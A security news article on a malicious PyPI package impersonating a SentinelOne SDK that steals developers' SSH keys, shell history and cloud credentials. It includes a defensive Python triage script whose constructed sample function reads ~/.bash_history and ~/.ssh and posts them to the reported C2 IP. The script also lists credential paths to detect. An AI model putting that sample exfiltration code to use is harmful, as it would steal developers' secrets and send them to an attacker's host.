Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware

Cybersecurity researchers at ReversingLabs have discovered a new malicious package, named ‘SentinelOne,’ on the Python Package Index (PyPI) repository that impersonates a legitimate software development kit (SDK) for SentinelOne.

The package has no connection to the threat detection firm of the same name and was first uploaded to PyPI on Dec 11, 2022.

The package appears to be a fully functional SentinelOne client but contains a malicious backdoor, according to ReversingLabs threat researcher Karlo Zanki. The malicious functionality in the library does not execute on installation; it waits to be called programmatically before activating, a possible effort to avoid detection (an install-time sandbox that only executes the package's setup code would see nothing suspicious). ReversingLabs is calling this campaign “SentinelSneak.”

The backdoor was designed to exfiltrate data specific to development environments, such as shell command history and the contents of the .ssh folder (SSH keys and configuration), as well as configuration files that hold login credentials for Git, Kubernetes, and AWS services.

The malware also enumerates the directories in the filesystem root and sends all collected data to the command-and-control (C&C) server.

The fake ‘SentinelOne’ package contains files holding the code that steals this data and uploads it to the IP address 54[.]254[.]189[.]27.
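The two properties described above (the payload only runs when called, and it pairs reads of developer secrets with an upload to a hard-coded IP) are exactly what a quick static triage of a suspect package should surface. The following is an added example, not ReversingLabs' tooling and not the malicious package's own code: it parses Python source with `ast`, flags string literals that name sensitive dev-environment paths or IPv4 addresses plus common network calls, and reports whether the flagged code would run at import time or only when a function is invoked. The sample sources are constructed here to mimic the described behaviour; the path markers and network function names are assumptions, and the C2 address is the one the article reports, refanged.

```python
"""Static triage for SentinelSneak-style indicators in a Python package.

Added example; not the malicious package's code and not a ReversingLabs tool.
"""
import ast
import re
from typing import Dict, List, Optional, Tuple

# Assumed markers: dev-environment artefacts worth flagging when a package reads them.
SENSITIVE_MARKERS = (".bash_history", ".zsh_history", ".ssh", ".gitconfig", ".kube", ".aws")
# Exfiltration address reported in the article (refanged from 54[.]254[.]189[.]27).
C2_IP = "54.254.189.27"
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# Assumed list of call names that usually mean "send data somewhere".
NETWORK_FUNCS = ("post", "urlopen", "connect", "sendall")

Finding = Tuple[str, str, Optional[str]]  # (kind, value, enclosing def or None)


def _walk_with_scope(tree: ast.AST):
    """Yield (node, scope); scope is the enclosing function name, None at module level."""
    stack = [(tree, None)]
    while stack:
        node, scope = stack.pop()
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            scope = node.name
        for child in ast.iter_child_nodes(node):
            stack.append((child, scope))
        yield node, scope


def triage_source(src: str) -> Dict[str, object]:
    """Return indicators found in one Python source file and whether they fire on import."""
    tree = ast.parse(src)
    findings: List[Finding] = []
    module_level_calls = set()  # names invoked directly at module level (run on import)
    for node, scope in _walk_with_scope(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(marker in node.value for marker in SENSITIVE_MARKERS):
                findings.append(("sensitive_path", node.value, scope))
            for ip in IPV4_RE.findall(node.value):
                findings.append(("ip_literal", ip, scope))
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Attribute):
                name = func.attr
            elif isinstance(func, ast.Name):
                name = func.id
                if scope is None:
                    module_level_calls.add(name)
            else:
                name = None
            if name in NETWORK_FUNCS:
                findings.append(("network_call", name, scope))

    kinds = {kind for kind, _, _ in findings}
    return {
        "findings": findings,
        "c2_match": any(k == "ip_literal" and v == C2_IP for k, v, _ in findings),
        # Flagged code runs at import if it sits at module level, or inside a
        # function that module-level code calls; otherwise it is lazy (SentinelSneak style).
        "runs_on_import": any(s is None or s in module_level_calls for _, _, s in findings),
        "suspicious": "sensitive_path" in kinds and "network_call" in kinds,
    }


# Constructed sample: the shape the article describes, payload only in a function body.
CONSTRUCTED_LAZY_SAMPLE = '''
import os, requests

def collect_and_send():
    data = {}
    data["history"] = open(os.path.expanduser("~/.bash_history")).read()
    data["ssh"] = os.listdir(os.path.expanduser("~/.ssh"))
    data["root"] = os.listdir("/")
    requests.post("http://54.254.189.27/upload", json=data)
'''

# Constructed sample with nothing of interest.
CONSTRUCTED_BENIGN_SAMPLE = '''
def add(a, b):
    return a + b
'''

if __name__ == "__main__":
    for label, sample in (("lazy", CONSTRUCTED_LAZY_SAMPLE), ("benign", CONSTRUCTED_BENIGN_SAMPLE)):
        print(label, triage_source(sample))
```

Run this over every `.py` file in an unpacked sdist or wheel (including `setup.py`); a `suspicious` hit with `runs_on_import` false is the pattern this campaign used, which is why install-time sandboxing alone would have missed it.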

The threat actors also published five additional packages with similar names. These did not contain the files with malicious functionality, which suggests they were used for testing.

The ReversingLabs research team is continuously monitoring open-source package repositories for instances of malicious code.

About the Author:

FirstHackersNews - Identifies Security
